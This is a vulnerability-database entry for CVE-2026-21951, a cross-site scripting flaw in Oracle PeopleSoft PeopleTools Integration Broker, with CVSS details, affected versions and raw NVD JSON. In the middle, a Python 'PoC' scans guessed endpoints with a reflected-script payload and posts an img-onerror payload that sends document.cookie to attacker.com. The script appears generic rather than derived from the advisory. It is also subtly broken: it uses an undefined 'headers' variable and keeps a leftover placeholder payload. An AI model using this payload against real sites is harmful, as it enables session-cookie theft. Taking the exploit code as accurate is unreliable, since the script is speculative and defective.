Security Vulnerability Report
中文
CVE-2026-21951 CVSS 6.1 MEDIUM

CVE-2026-21951

Published: 2026-01-20 22:15:58
Last Modified: 2026-01-29 20:59:18
Source: [email protected]

Description

Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.60:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise PeopleTools 8.60
Oracle PeopleSoft Enterprise PeopleTools 8.61
Oracle PeopleSoft Enterprise PeopleTools 8.62

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2026-21951 PoC - PeopleSoft Integration Broker Exploitation # Target: Oracle PeopleSoft Enterprise PeopleTools # Affected Versions: 8.60, 8.61, 8.62 TARGET_URL = "https://vulnerable-server/psp/ps/".replace("vulnerable-server", "TARGET_HOST") CVE_ID = "CVE-2026-21951" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-21951""" # Step 1: Identify Integration Broker endpoint ib_endpoints = [ "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ENDPOINT_LKP.GBL", "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL", "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ROUTING_LKP.GBL" ] # Step 2: Test for XSS in Integration Broker parameters xss_payload = "<script>alert('CVE-2026-21951')</script>" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-21951-scanner)", "Content-Type": "application/x-www-form-urlencoded" } for endpoint in ib_endpoints: try: # Step 3: Send test request with XSS payload response = requests.get( TARGET_URL + endpoint, params={"IB_XSS_TEST": xss_payload}, headers=headers, timeout=30, verify=False ) # Step 4: Check if payload is reflected without sanitization if xss_payload in response.text: print(f"[+] Potential vulnerability found at {endpoint}") print(f"[+] Payload reflected - XSS may be exploitable") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return False def exploit_integration_broker(): """Attempt exploitation of Integration Broker vulnerability""" # Malicious payload for data extraction exploit_payload = { "IB_SERVICE_NAME": "XSS_PAYLOAD_HERE", "IB_ROUTING": "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'>", "OPRID": "test", "PASSWORD": "test" } try: response = requests.post( TARGET_URL + "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL", data=exploit_payload, headers=headers, timeout=30, verify=False ) return response.status_code == 200 except: return False if __name__ == "__main__": print(f"[*] Scanning for {CVE_ID}") print(f"[*] Target: {TARGET_URL}") if check_vulnerability(): print(f"[!] Target appears vulnerable to {CVE_ID}") print(f"[!] Consider testing with authenticated session") else: print(f"[*] No obvious vulnerability detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21951", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.110", "lastModified": "2026-01-29T20:59:17.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Integration Broker). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto PeopleSoft Enterprise PeopleTools de Oracle PeopleSoft (componente: Integration Broker). Versiones compatibles que están afectadas son 8.60, 8.61 y 8.62. Vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer PeopleSoft Enterprise PeopleTools. Ataques exitosos requieren interacción humana de una persona distinta al atacante y aunque la vulnerabilidad está en PeopleSoft Enterprise PeopleTools, los ataques pueden impactar significativamente productos adicionales (cambio de alcance). Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de actualización, inserción o eliminación a algunos de los datos accesibles de PeopleSoft Enterprise PeopleTools así como acceso de lectura no autorizado a un subconjunto de los datos accesibles de PeopleSoft Enterprise PeopleTools. Puntuación Base CVSS 3.1 de 6.1 (impactos en Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.60:*:*:*:*:*:*:*", "matchCriteriaId": "AF191D4F-3D54-4525-AAF5-B70D3FD2F818"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:*", "matchCriteriaId": "18F15FC6-947A-462A-8329-C52907799A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:*", "matchCriteriaId": "FF0E4EFC-096B-4861-8D55-D8DAA37A21E9"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.